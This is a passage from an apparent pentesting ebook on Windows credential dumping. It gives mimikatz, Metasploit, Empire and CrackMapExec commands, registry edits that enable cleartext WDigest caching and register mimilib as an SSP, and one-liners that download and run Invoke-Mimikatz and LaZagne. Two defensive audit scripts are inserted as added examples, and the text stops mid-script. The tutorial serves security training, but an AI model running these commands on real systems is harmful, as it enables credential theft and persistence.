Credential Dumping Ethical Hacking

This document provides an overview of various methods of credential dumping on Windows systems. It discusses credential dumping from wireless networks, the Group Policy Preferences service, the Windows Credential Manager, WDigest authentication, the Security Support Provider, the SAM database, applications like FTP and email clients, the NTDS.dit file, phishing for credentials, the Local Security Authority service, the clipboard, DCSync attacks, the LAPS service, and dumping credentials from the domain cache. Various tools are described that can be used to dump credentials using each of these methods, such as Mimikatz, Metasploit, PowerShell scripts, and more.


www.hackingarticles.in Page | 1
Table of Contents
Introduction ....................................................... 7
What is Credential Dumping? ...................................... 7
Credential Dumping in Real Life .................................. 7
Credential Dumping: Wireless ....................................... 9
Manual Credential Dumping ........................................ 9
Credential Dumping using netsh .................................. 10
Credential Dumping using WirelessKeyView ........................ 12
Credential Dumping using Wifi Network Properties ................ 13
Credential Dumping using LaZagne ................................ 14
Credential Dumping using Mimikatz ............................... 15
Credential Dumping using Metasploit Framework ................... 16
Credential Dumping: Group Policy Preferences (GPP) ................ 18
What is Group Policy Preferences? ............................... 18
Why using GPP to create a user account is a bad Idea? ........... 18
Create an Account in Domain Controller with GPP ................. 19
Exploiting Group Policy Preferences via Metasploit-I ............ 21
Exploiting Group Policy Preferences via Metasploit -II .......... 22
Gpp-Decrypt ..................................................... 24
GP3finder ....................................................... 26
PowerShell Empire ............................................... 26
Windows Powershell .............................................. 27
Credential Dumping: Windows Credential Manager .................... 29
Accessing Credential Manager .................................... 29
Metasploit ...................................................... 32
Empire .......................................................... 33
CredentialsFileView ............................................. 35
Windows PowerShell .............................................. 36
Credential Dumping: WDigest ....................................... 38
Introduction to Wdigest ......................................... 38
Working of WDigest.dll .......................................... 38

Manual .......................................................... 39
PowerShell ...................................................... 42
PowerShell via Meterpreter ...................................... 43
Metasploit Framework ............................................ 45
PowerShell Empire ............................................... 46
CrackMapExec .................................................... 47
Credential Dumping: Security Support Provider (SSP) ............... 49
Introduction to Security Support Provider ....................... 49
Manual .......................................................... 49
Mimikatz ........................................................ 52
Metasploit Framework ............................................ 53
Koadic .......................................................... 55
PowerShell Empire ............................................... 56
Powershell Empire: mimilib.dll .................................. 57
Credential Dumping: SAM ........................................... 60
Introduction to SAM ............................................. 60
How are Passwords stored in Windows? ............................ 60
LM authentication ............................................... 60
NTLM authentication ............................................. 60
Windows 7 ......................................................... 61
PwDump7 ......................................................... 61
SamDump2 ...................................................... 62
Metasploit Framework: Invoke-Powerdump.ps1 .................... 62
Metasploit Framework: Get-PassHashes.ps1 ...................... 63
PowerShell .................................................... 63
Windows 10 ........................................................ 64
Mimikatz ...................................................... 64
Impacket ...................................................... 65
Metasploit Framework: HashDump ................................ 65
Metasploit Framework: credential_collector .................... 66
Metasploit Framework: load kiwi ............................... 66
Koadic ........................................................ 67
Powershell Empire: mimikatz/sam ............................... 68
LaZagne ....................................................... 69

CrackMapExec .................................................. 69
Decrypting Hash: John the Ripper .............................. 70
Credential Dumping: Applications .................................. 72
PowerShell Empire ............................................. 72
CoreFTP: Metasploit Framework ................................. 74
FTP Navigator: LaZagne ........................................ 74
FTPNavigator: Metasploit Framework ............................ 75
FileZilla: Metasploit Framework ............................... 75
HeidiSQL: Metasploit Framework ................................ 76
Email: Mail PassView .......................................... 76
Pidgin: Metasploit Framework .................................. 77
PSI: LaZagne .................................................. 78
PST: PstPassword .............................................. 78
VNC: Metasploit Framework ..................................... 79
WinSCP: LaZagne ............................................... 79
WinSCP: Metasploit Framework .................................. 80
Credential Dumping: NTDS.dit ...................................... 81
Introduction to NTDS .......................................... 82
Extracting Credential by Exploit NTDS.dit in Multiple Methods ... 83
FGDump ........................................................ 83
Powershell: NTDSUtil ............................................ 84
DSInternals ................................................... 85
NTDSDump.exe .................................................. 86
Remote: Metasploit (NTDS_location) ............................ 87
Metasploit (NTDS_grabber) ..................................... 87
Remote: Metasploit (secretsdump) .............................. 88
CrackMapExec .................................................. 89
Hash Cracking ................................................. 89
Credential Dumping: Phishing Windows Credentials .................. 92
Metasploit Framework: phish_windows_credentials ............... 92
FakeLogonScreen ............................................... 93
SharpLocker ................................................... 95
PowerShell Empire: collection/prompt .......................... 96
PowerShell Empire: collection/toasted ......................... 97

Koadic ........................................................ 98
PowerShell: Invoke-CredentialsPhish.ps1 ....................... 99
PowerShell: Invoke-LoginPrompt.ps1 ........................... 100
Lockphish .................................................... 101
Credential Dumping: Local Security Authority (LSA|LSASS.EXE) ..... 104
Windows 7 (lsass.exe) Credential Dump using Mimikatz ............. 105
Method 1: Task manager ....................................... 105
Method 2: ProcDump ........................................... 107
Method 3: comsvcs.dll ........................................ 108
Windows 10 (LSA) Credential Dump ................................. 109
Method 1: Task manager ....................................... 109
Method 2: Mimikatz parameter -patch .......................... 112
Method 3: Mimikatz – Token Elevation ......................... 113
Method 4: Editing File Permission in the Registry ............ 114
Method 5: Save privilege File of the Registry ................ 116
PowerShell Empire ............................................ 118
Koadic ....................................................... 119
Metasploit ....................................................... 120
Method 1: Load kiwi .......................................... 120
Method 2: Load powershell .................................... 121
CrackMapExec ................................................. 122
Credential Dumping: Clipboard .................................... 124
PowerShell Empire ............................................ 125
Meterpreter Framework ........................................ 126
Koadic ....................................................... 127
Credential Dumping: DCSync ....................................... 129
What is DCSYNC Attack ........................................ 129
Mimikatz ..................................................... 129
PowerShell Empire ............................................ 133
Metasploit ................................................... 135
Credential Dumping: LAPS ......................................... 138
Configuration ................................................ 138
Metasploit ................................................... 142
PowerShell Empire ............................................ 143

Credential Dumping: Domain Cache Credential ...................... 145
Domain Cache credential (DCC2) ............................... 145
Metasploit ................................................... 145
Impacket ..................................................... 146
Mimikatz ..................................................... 147
PowerShell Empire ............................................ 148
Koadic ....................................................... 149
Python Script ................................................ 150
Cracking DCC2 or MSCACHE2/MSCASH2 ............................ 151
Credential Dumping: Fake Services ................................ 153
Introduction ................................................. 153
FTP .......................................................... 153
Telnet ....................................................... 155
VNC .......................................................... 156
SMB .......................................................... 157
http_basic ................................................... 160
POP3 ......................................................... 162
SMTP ......................................................... 163
PostgreSQL ................................................... 164
MsSQL ........................................................ 165
http_ntlm .................................................... 166
MySQL ........................................................ 167
Credential Dumping: Windows Autologon Password ................... 170
Method 1: Nirsoft-Network Password Recovery .................. 171
Method 2: DecryptAutologon.exe ............................... 172
Reference ........................................................ 172
About Us ......................................................... 174

Introduction

When the term password cracking is used in the cyber world, it is used as a broad concept, as it covers all the methods related to attacking, dumping or retrieving the passwords of a victim or target. In this article, however, we will focus solely on a technique called credential dumping.

What is Credential Dumping?

Credential dumping is a technique through which usernames and passwords are extracted from the login accounts on a target system. It is this technique that allows an attacker to obtain the credentials of multiple accounts from one person, and those credentials can belong to anything: a bank, an email account, a social media account, wireless networks.

Credential Dumping in Real Life

Once an attacker has access to the target system, that access lets them retrieve the whole bunch of the victim's credentials. Inside the target's system there are multiple methods to retrieve the credentials of a particular thing. For instance, to recover all the names and passwords of the wireless networks the operating system has connected to, there are various methods an attacker can use, and we will try to cover all of them in this article. Another point to note is that credential dumping can be done in both internal and external penetration testing; which method is most suitable depends on the methodology, perspective or scope of the engagement.

Credential Dumping: Wireless

Manual Credential Dumping

All the Wi-Fi passwords, with their respective SSIDs, are stored in XML files. The location of these files is C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\***. Here you will find that the SSID of the Wi-Fi network is saved in clear text, whereas the password is stored as a key.

Credential Dumping using netsh

Netsh, short for network shell, is a scripting utility provided by Microsoft itself. It can be used from both the command prompt and Windows PowerShell. When executed, it provides detailed information about every network configuration the system has ever had, including the credentials of the wireless networks it has ever been connected to. The utility comes with various parameters that can be used to retrieve different information as required. This method can be used in both internal and external penetration testing, as netsh commands can be executed both locally and remotely.
To get the list of SSIDs the device has been connected to, use the following command:

netsh wlan show profiles

As a result of the above command, you can see the names of the Wi-Fi networks that the system was connected to in the past or present, such as Meterpreter, Linuxlab, etc. The same is shown in the image above.

Further, to know the password of any one of the listed SSIDs, use the following command:

netsh wlan show profile name=<SSID Name> key=clear

Just as shown in the image above, the result of the above command gives you the password.

Credential Dumping using WirelessKeyView

WirelessKeyView is a simple piece of software that accesses the XML files where wireless passwords are stored and reveals them in clear text. This tool was developed to recover lost and forgotten wireless network passwords. It is the perfect method for credential dumping in internal network penetration testing. To use this method, simply download the tool from here and run it; you will get all the Wi-Fi names and their passwords, as shown in the image below:

Credential Dumping using Wifi Network Properties

Our next method is manual. It is useful when you have been introduced to the network you are to work on but, for some reason, the password of the network hasn't been revealed to you; this method falls under the internal penetration testing methodology. To reveal the password of a wireless network manually, go to Control Panel > Network and Internet > Network and Sharing Center and then click on Wi-Fi (*SSID*). A dialogue box opens; in that box, click the Wireless Properties button in the upper pane. Next, go to the Security tab, where you can see the password, just as shown in the image below:

Credential Dumping using LaZagne

LaZagne is an open-source tool that was developed to retrieve all the passwords stored on your machine. We have covered LaZagne in another article, which you can read here. In our experience, LaZagne is an amazing tool for credential dumping, and it is the best tool to use for external penetration testing. To extract Wi-Fi passwords with LaZagne, simply download the tool from here and run it remotely using the following command:

lazagne.exe wifi

After running the above command, all the Wi-Fi passwords with their respective SSIDs are extracted.

Credential Dumping using Mimikatz

Another method that can be very useful in external penetration testing is Mimikatz. We have covered various features of Mimikatz in another article, which you can find here. Once you have the victim's session, use the following commands to get the passwords:

getsystem
load kiwi
wifi_list_shared

And very easily you will have all the passwords at your service, as shown in the image above.

Credential Dumping using Metasploit Framework

Our next method uses Metasploit to retrieve the desired passwords. As we all know, Metasploit is a framework that provides ready-made exploits to make pentesting convenient, and it is an amazing platform for both beginners and experts in the pentesting world. To dump credentials, Metasploit has a built-in post-exploitation module. To run it, open the Metasploit console by typing msfconsole and get a session on the target system using any exploit you prefer. Then background the session and run the post module to extract the desired Wi-Fi credentials with the following commands:

use post/windows/wlan/wlan_profile
set session 1
exploit

Just as shown in the image above, you will have your credentials.

Credential Dumping: Group Policy Preferences (GPP)

What is Group Policy Preferences?

Group Policy Preferences, GPP for short, permit administrators to configure and deploy Windows and application settings that were previously unavailable through Group Policy. One of the most useful features of GPP is the ability to store and use credentials in several scenarios, and these policies can make all kinds of configuration changes to machines, such as:
- Map Drives
- Create Local Users
- Data Sources
- Printer configuration
- Registry Settings
- Create/Update Services
- Scheduled Tasks
- Change local Administrator passwords

Why using GPP to create a user account is a bad Idea?

If you use Microsoft GPP to create a local administrator account, consider the security consequences carefully, because the password is stored in SYSVOL inside the preference item. SYSVOL is the domain-wide share in Active Directory that is accessible to all authenticated users.
All domain Group Policies are stored here: \\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\
When a new GPP is created for a user or group account, it is associated with a Groups.xml file created in SYSVOL that holds the relevant configuration information, and the password in it is AES-256 encrypted. Even so, the password is not secure at all: every authenticated user has access to SYSVOL, and the AES key is publicly known.
"In this article, we will be doing Active Directory penetration testing through Group Policy Preferences and try to steal the stored password from inside SYSVOL in multiple ways."
Let's Start!!
Lab Setup Requirements:
- Microsoft Windows Server 2008 R2
- Microsoft Windows 7/10
- Kali Linux

Create an Account in Domain Controller with GPP

On your Windows Server 2008, you need to create a new Group Policy Object (GPO) under "Domain Controller" using Group Policy Management.

Now create a new user account by navigating to Computer Configuration > Control Panel Settings > Local Users and Groups.
Then right-click the "Local Users and Groups" option and select New > Local User.

You then get the New Local User Properties interface, where you can create the new user account.

As you can observe from the image below, we have created an account for the user "raaz".

Don’t forget to update the group policy configuration.

So, as already discussed above, whenever a new GPP is created for a user or group account, it is associated with a Groups.xml file stored inside SYSVOL.
From the image below, you can see the entire path that leads to the file Groups.xml. As you can see, this XML file holds the cpassword for user raaz within the Properties tag, in plain text.

Exploiting Group Policy Preferences via Metasploit-I

As we know, any authenticated user can access SYSVOL. Suppose I know a client machine credential, say raj:Ignite@123; with its help I can exploit Group Policy Preferences to get the XML file.
The Metasploit auxiliary module lets you enumerate files from target domain controllers by connecting to SMB as this rogue user.
This module enumerates files from target domain controllers and connects to them via SMB. It then looks for Group Policy Preference XML files containing local/domain user accounts and passwords and decrypts them using Microsoft's public AES key. This module has been tested successfully on a Win2k8 R2 Domain Controller.

use auxiliary/scanner/smb/smb_enum_gpp
msf auxiliary(smb_enum_gpp) > set rhosts 192.168.1.103
msf auxiliary(smb_enum_gpp) > set smbuser raj
msf auxiliary(smb_enum_gpp) > set smbpass Ignite@123
msf auxiliary(smb_enum_gpp) > exploit

Hence you can observe that it has dumped the password abcd@123 from inside the Groups.xml file for user raaz.

Exploiting Group Policy Preferences via Metasploit-II

Metasploit also provides a post-exploitation module for enumerating the cpassword, but for this you need to have compromised the target machine at least once; then you can run the post module below.
This module enumerates the victim machine's domain controller and connects to it via SMB. It then looks for Group Policy Preference XML files containing local user accounts and passwords and decrypts them using Microsoft's public AES key. Cached Group Policy files may be found on end-user devices if the group policy object is deleted rather than unlinked.

use post/windows/gather/credentials/gpp
msf post(windows/gather/credentials/gpp) > set session 1
msf post(windows/gather/credentials/gpp) > exploit

From the image below you can observe that it has found the cpassword twice, in two different locations:
C:\ProgramData\Microsoft\Group Policy\History\{EE416E94-7362-4587-9CEC-651656DB7538}\Machine\Preferences\Groups\Groups.xml
C:\Windows\SYSVOL\sysvol\Pentest.Local\Policies\{EE416E94-7362-4587-9CEC-651656DB7538}\Machine\Preferences\Groups\Groups.xml

Gpp-Decrypt

Another method is to connect to the target machine via SMB and access SYSVOL with the help of smbclient. Execute the following command to access the shared directory with an authorised account, then move to the following path to get the Groups.xml file: SYSVOL\sysvol\Pentest.Local\Policies\{EE416E94-7362-4587-9CEC-651656DB7538}\Machine\Preferences\Groups\Groups.xml

smbclient //192.168.1.103/SYSVOL -U raj

As you can observe, we have successfully transferred Groups.xml to our local machine. As this file holds the cpassword, we now need to decrypt it.

For decryption we use gpp-decrypt, a simple Ruby script bundled with Kali Linux that decrypts a given GPP-encrypted string. Once you have the Groups.xml file, you can decrypt the cpassword with the following syntax:

gpp-decrypt <encrypted cpassword>

For example:

gpp-decrypt qRI/NPQtItGsMjwMkhF7ZDvK6n9KlOhBZ/XShO2IZ80

As a result, it dumps the password in plain text as shown below.

GP3finder

GP3finder is another script, written in Python, for decrypting the cpassword; you can download the tool from here. Once you have the Groups.xml file, you can decrypt the cpassword with the following syntax:

gp3finder.exe -D <encrypted cpassword>

For example:

gp3finder.exe -D qRI/NPQtItGsMjwMkhF7ZDvK6n9KlOhBZ/XShO2IZ80

As a result, it dumps the password in plain text as shown below.

PowerShell Empire

PowerShell Empire is another framework, just like Metasploit, where you first need to obtain a low-privilege shell. Once you have exploited the target machine, use the privesc/gpp module to extract the password from the Groups.xml file. This module retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.

agents
usemodule privesc/gpp
execute

As a result, it dumps the password in plain text as shown below.

Windows PowerShell

There is another method to retrieve the plaintext password and other information for accounts pushed through Group Policy Preferences locally, with the help of the PowerSploit script Get-GPPPassword. You can download the module from here; it is a PowerShell script which you need to import before use. Get-GPPPassword searches a domain controller for groups.xml, scheduledtasks.xml, services.xml and datasources.xml and returns plaintext passwords.
Now run the following commands in PowerShell:

Import-Module .\Get-GPPPassword.ps1
Get-GPPPassword

As a result, you can observe that it has dumped the saved password from inside the Groups.xml file.
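The same Groups.xml, ScheduledTasks.xml, Services.xml and DataSources.xml files that Get-GPPPassword and the Metasploit modules above hunt for are what a domain administrator should be auditing SYSVOL for. The following Python script is an added example, not code from the original article or from any tool it mentions: it walks a SYSVOL (or local GPP History) tree, reports every preference item that still carries a cpassword attribute together with the account it belongs to, flags files it cannot parse instead of skipping them, and never decrypts anything. The Groups.xml content, GUIDs and cpassword value it builds are constructed placeholders.

```python
"""Audit a SYSVOL tree (or the local GPP cache under
C:\\ProgramData\\Microsoft\\Group Policy\\History) for Group Policy Preference
items that still carry a cpassword attribute.  Added example, not code from the
original article: it reports where stored passwords sit so an administrator can
delete those preference items; it never decrypts them."""
import os
import tempfile
import xml.etree.ElementTree as ET

# Preference files that can embed credentials (the ones Get-GPPPassword searches)
GPP_FILES = {"groups.xml", "scheduledtasks.xml", "services.xml", "datasources.xml"}
# Attributes that name the account a stored password belongs to
ACCOUNT_ATTRS = ("userName", "runAs", "accountName", "username")


def scan_gpp_file(path):
    """Return one finding per element in `path` that carries a cpassword attribute."""
    try:
        root = ET.parse(path).getroot()
    except ET.ParseError as exc:
        # A corrupt or half-written file still deserves a look: report, don't skip
        return [{"file": path, "error": f"unparseable XML: {exc}"}]
    parents = {child: parent for parent in root.iter() for child in parent}
    findings = []
    for elem in root.iter():
        if "cpassword" not in elem.attrib:
            continue
        item = parents.get(elem, elem)  # <Properties> sits under the item (<User>, <Task>, ...)
        account = next((elem.attrib[a] for a in ACCOUNT_ATTRS if a in elem.attrib), None)
        findings.append({
            "file": path,
            "item": item.tag,
            "name": item.attrib.get("name"),
            "account": account,
            # GPP writes cpassword="" when no password was set; only a non-empty one is exposed
            "cpassword_present": elem.attrib["cpassword"] != "",
        })
    return findings


def scan_sysvol(root_dir):
    """Walk a SYSVOL (or GPP History) tree and collect findings from every GPP file."""
    results = []
    for dirpath, dirs, files in os.walk(root_dir):
        dirs.sort()  # deterministic traversal order
        for name in sorted(files):
            if name.lower() in GPP_FILES:
                results.extend(scan_gpp_file(os.path.join(dirpath, name)))
    return results


# Constructed sample mirroring the article's Groups.xml: user "raaz" with a stored
# password, plus a second item whose cpassword is empty.  CLSIDs, UIDs and the
# cpassword value are placeholders, not real values.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{PLACEHOLDER-GROUPS-CLSID}">
  <User clsid="{PLACEHOLDER-USER-CLSID}" name="raaz" image="0" uid="{PLACEHOLDER-UID-1}">
    <Properties action="C" fullName="" description="" cpassword="PLACEHOLDER+ENCRYPTED+VALUE=="
                changeLogon="0" noChange="0" neverExpires="0" acctDisabled="0" userName="raaz"/>
  </User>
  <User clsid="{PLACEHOLDER-USER-CLSID}" name="svc_nopass" image="0" uid="{PLACEHOLDER-UID-2}">
    <Properties action="U" fullName="" description="" cpassword=""
                changeLogon="0" noChange="0" neverExpires="0" acctDisabled="0" userName="svc_nopass"/>
  </User>
</Groups>
"""


def build_sample_sysvol():
    """Lay out a temporary tree like SYSVOL\\<domain>\\Policies\\{GUID}\\Machine\\Preferences (constructed)."""
    base = tempfile.mkdtemp(prefix="sysvol_sample_")
    prefs = os.path.join(base, "Policies", "{PLACEHOLDER-GPO-GUID}", "Machine", "Preferences")
    os.makedirs(os.path.join(prefs, "Groups"))
    os.makedirs(os.path.join(prefs, "Services"))
    with open(os.path.join(prefs, "Groups", "Groups.xml"), "w", encoding="utf-8") as fh:
        fh.write(SAMPLE_GROUPS_XML)
    # A truncated Services.xml: must be reported as unreadable rather than silently skipped
    with open(os.path.join(prefs, "Services", "Services.xml"), "w", encoding="utf-8") as fh:
        fh.write('<?xml version="1.0"?><NTServices><NTService name="svc"')
    # An unrelated GPO file that must be ignored
    with open(os.path.join(base, "Policies", "GPT.INI"), "w", encoding="utf-8") as fh:
        fh.write("[General]\nVersion=1\n")
    return base


def audit_sample():
    """Run the scan over the constructed tree and return the findings list."""
    return scan_sysvol(build_sample_sysvol())


if __name__ == "__main__":
    for f in audit_sample():
        if "error" in f:
            print(f"[!] {f['file']}: {f['error']}")
        else:
            level = "HIGH" if f["cpassword_present"] else "info"
            print(f"[{level}] {f['file']}: {f['item']} '{f['name']}' -> account '{f['account']}'")
```

Point scan_sysvol() at a mounted SYSVOL share or at C:\ProgramData\Microsoft\Group Policy\History on a workstation to find cached copies as well.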

Credential Dumping: Windows Credential Manager

Accessing Credential Manager

To access Credential Manager, you can simply search for it in the Start menu, or you can open it by either of the following two methods:
You can open Control Panel > User Accounts > Credential Manager.
You can also access it from the command line with the vaultcmd command and its parameters.
When you connect to another system in the network using any method, like in the following image:

and, while connecting, you provide the password and choose to store it for later use, then these credentials are saved in Credential Manager.

Irrespective of the website and its security, when you save any password in Edge or in any other application such as Skype or Outlook, that password too gets saved in Credential Manager. For instance, we have stored a Gmail password in our practice, as shown in the image below:

You can confirm from the following image that the password is indeed saved.

Now, when you access Credential Manager by any of these methods, you will find that the Windows Credentials tab stores all the system and network passwords.

Under the Web Credentials tab are the applications' passwords and the passwords saved in Edge.

Metasploit

Now all these credentials can be dumped with simple methods. Once you have a session through Metasploit, all you have to do is upload mimikatz and run it. Mimikatz is an amazing credential dumping tool; we have covered it in detail in one of our previous articles, which you can read here.
To run mimikatz remotely through the Metasploit session, use the following commands:

upload /root/Desktop/mimikatz.exe
shell
cd <location of the uploaded file on the target system>
mimikatz.exe

Once mimikatz has executed successfully, you will get the credentials from Credential Manager as shown in the image above.

Empire

Similarly, with Empire, you can dump the credentials by downloading lazagne.exe directly onto the target system and then running it to get all the credentials. LaZagne is one of the best credential dumping tools; we have covered it in detail in one of our previous articles, which you can read here.
Use the following commands to dump the credentials with this method:

shell wget https://github.com/AlessandroZ/LaZagne/releases/download/2.4.3/lazagne.exe -outfile lazagne.exe
shell dir
shell ./lazagne.exe all

After the execution of commands, you can see that the passwords have been retrieved as shown in
the following image:

CredentialsFileView

Our next method uses a third-party tool, CredentialsFileView. This tool is very effective when it comes to internal penetration testing. To use it, simply download and launch it; after launching, it asks you for the Windows password.

Once you provide the password, it will give you all the credentials you need as shown in the image
below:

Windows PowerShell

This method of password dumping can prove useful in both internal and external pentesting. In this method you run a script in Windows PowerShell; you will find the script here. Once you run the script you will have all the web credentials, as shown in the image below:

You can also use PowerShell remotely to dump credentials with the help of Metasploit. It is very simple
as you just have to run a combination of the following commands after you have your session:

load powershell
powershell_import /root/Get-WebCredentials.ps1
powershell_execute Get-WebCredentials

And just like that with the help of PowerShell commands, you will have the desired credentials.

Credential Dumping: WDigest

Introduction to WDigest

WDigest.dll, introduced with Windows XP, was specifically crafted for HTTP and SASL authentication. Its job was to send confirmation of secret keys to authenticate to those protocols. The security attributes of the NTLM protocol were applied to this DLL file, as it is a challenge/response protocol too. The WDigest protocol is enabled by default in Windows XP through Windows 8.0 and Windows Server 2003 through Windows Server 2012, which allows credentials to be kept in clear text in LSASS. Windows 10, Windows Server 2012 R2 and Windows Server 2016 do not have this protocol active, and Microsoft also released a patch for the earlier versions.

Working of WDigest.dll

As it is a challenge-response protocol, it is important to understand how it works. Such protocols require a validating server that creates a challenge for the client; the challenge contains unpredictable data. A key is derived from the user's password, and it is used to encrypt the challenge and craft a response. A trusted service can then validate the user by comparing its own computed value with the encrypted response received from the client; if the two match, the user is authenticated.
Now that we have understood what the WDigest protocol is and how it works, let's get to practice how to exploit it.

Manual

Our first method of exploiting WDigest to dump the desired credentials is manual. Such a method comes in handy in white-box pentesting. In this method, download mimikatz and run the following commands:

privilege::debug
sekurlsa::wdigest

As you can then see, the above commands didn't bear fruit because the WDigest protocol wasn't active. To activate the protocol, use the following command:

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1

The above command creates a value called UseLogonCredential under the WDigest key in the registry and sets it to 1, as you can see in the image below:

This step has enabled WDigest on the system, which allows passwords to be kept in memory, in clear text. These passwords can now be retrieved sneakily, as you will see further in this article.

www.hackingarticles.in Page | 40
For now, we need to update the policy that we just entered in the registry using the following
command:

gpupdate /force

Now, if you launch mimikatz and run the following commands then you will have the credentials.

privilege::debug
sekurlsa::wdigest

In this method, we will be invoking a PowerShell script on the system, which will help us get our hands on the credentials.
Download WdigestDowngrade.ps1
Simply launch a PowerShell prompt and run the following commands:

Import-Module .\WdigestDowngrade.ps1
Invoke-WdigestDowngrade
reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest

Once the above commands are executed successfully, run the following command to dump the
credentials.

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds

And as you can see, we got the credentials.

In this method, we will be invoking the PowerShell script from our meterpreter session, which will help us get our hands on the credentials. Once you have a meterpreter session, run the following commands to create the UseLogonCredential value and make the change in the registry key:

reg enumkey -k HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest
load powershell
powershell_import /root/Desktop/Invoke-WdigestDowngrade.ps1
powershell_execute Invoke-WdigestDowngrade

Once the above commands have created the UseLogonCredential value as required, you can launch mimikatz to dump the credentials using the following commands:
Download Invoke Mimikatz.ps1

load powershell
powershell_import /root/Invoke-Mimikatz.ps1
powershell_execute Invoke-Mimikatz -DumpCreds

Our next method is an excellent way to dump the credentials remotely, which is often a requirement in grey-box pentesting. Once you have your meterpreter session via Metasploit, background the session and then run the wdigest_caching post-exploitation module, which makes the same change to the WDigest key that we just made manually in the previous method, using the following commands:

use post/windows/manage/wdigest_caching
set session 1
run

Then load the kiwi extension to dump the credentials. To do so, type:

load kiwi
creds_wdigest

And yes! We got our credentials.

When you have a session through Empire, use the wdigest_downgrade post-exploitation module to create the UseLogonCredential value in the WDigest key with the data 1, with the help of the following commands:

usemodule management/wdigest_downgrade*
execute

Once the above module has executed successfully, you can use another built-in module to dump the credentials with the following set of commands:

usemodule credentials/mimikatz/command*
set Command sekurlsa::wdigest
execute

And after the execution of the above command, you have the credentials.

CrackMapExec is a sleek tool that can be installed with a simple apt install and it runs very swiftly. Its wdigest module sets the registry value that causes passwords to be stored in memory, as discussed previously. It requires a few things.
Requirements:
Username: Administrator
Password: Ignite@987
IP Address: 192.168.1.105

crackmapexec smb 192.168.1.105 -u 'Administrator' -p 'Ignite@987' -M wdigest -o ACTION=enable

Security Support Provider (SSP) is an API used by Windows to carry out authentication for Windows logon. It is a DLL that provides security packages to other applications. This DLL stacks itself up in LSA when the system starts, making it a start-up process. After it is loaded in LSA, it can access all of the Windows credentials. The configuration is stored in two different registry keys; the one used in this article is:

HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages

The first method that we are going to use to exploit SSP is manual. Once the method is carried out and the system reboots, it will dump the credentials for us. These credentials can be found in a file named kiwissp that is created upon user login; the registry entry that makes this happen lives under hklm\system\currentcontrolset\control\lsa.
The first step in this method is to copy the mimilib.dll file from the mimikatz folder to the system32 folder. This file is responsible for creating the kiwissp file, which stores credentials in plaintext for us.

Then navigate to hklm\system\currentcontrolset\control\lsa. Here you can find that there is no entry in Security Packages, as shown in the image below:

The same can be checked with the following PowerShell command:

reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"

Just as shown in the image below, there is no entry. So, this needs to be changed if we want to dump the credentials. We need to add all the packages that SSP uses to manage credentials, such as Kerberos, wdigest etc., together with mimilib. Therefore, we will use the following command to make these entries:

reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages" /d "kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mimilib" /t REG_MULTI_SZ /f

And then, to confirm whether the entry has been made, use the following command:

reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"

You can then navigate again to hklm\system\currentcontrolset\control\lsa to see the entries that you just made.

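Both changes described so far, the UseLogonCredential value under the WDigest key and the extra mimilib entry in Security Packages, are visible with the same reg query commands this article uses. The following added example (not code from the original article) parses reg query output and flags either change, which is the check a defender runs across a fleet. The sample output is constructed, the key paths are the ones on this page, and the list of built-in package names is an assumption to adjust for your Windows version:

```python
import re

# Values this article shows being set; a defender checks them for the
# opposite reason. Registry paths are the ones used on this page.
WDIGEST_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest"
LSA_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa"
# Assumed list of packages Windows ships itself; anything else listed in
# "Security Packages" is a custom SSP DLL that LSASS will load at boot.
BUILTIN_SSPS = {"kerberos", "msv1_0", "schannel", "wdigest", "tspkg", "pku2u", "cloudap"}

_VALUE_RE = re.compile(r"^\s+(.+?)\s+(REG_[A-Z_]+)\s*(.*)$")


def parse_reg_query(text):
    """Parse `reg query` output into {(key, value_name): (type, data)}."""
    values, key = {}, None
    for line in text.splitlines():
        if line.startswith("HKEY_"):
            key = line.strip().rstrip("\\")
            continue
        m = _VALUE_RE.match(line)
        if m and key:
            name, typ, data = m.groups()
            if typ == "REG_MULTI_SZ":
                # reg.exe prints the embedded NUL separators as the two characters \0
                data = [s for s in data.split(r"\0") if s]
            values[(key, name)] = (typ, data)
    return values


def audit(values):
    """Return findings for the two settings discussed in this article."""
    findings = []
    typ, data = values.get((WDIGEST_KEY, "UseLogonCredential"), (None, None))
    if typ == "REG_DWORD" and int(data, 16) != 0:
        findings.append("WDigest UseLogonCredential is enabled: cleartext passwords are kept in LSASS")
    typ, data = values.get((LSA_KEY, "Security Packages"), (None, []))
    for pkg in data or []:
        if pkg.lower() not in BUILTIN_SSPS:
            findings.append(f"non-built-in SSP registered in Security Packages: {pkg}")
    return findings


def audit_text(text):
    return audit(parse_reg_query(text))


# Constructed sample shaped like reg query output after the changes shown on
# this page (UseLogonCredential set to 1, mimilib appended).
SAMPLE_TAMPERED = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest
    UseLogonCredential    REG_DWORD    0x1

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
    Security Packages    REG_MULTI_SZ    kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mimilib
"""

# Constructed sample of the untouched state (value 0, empty package list).
SAMPLE_CLEAN = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest
    UseLogonCredential    REG_DWORD    0x0

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
    Security Packages    REG_MULTI_SZ
"""


if __name__ == "__main__":
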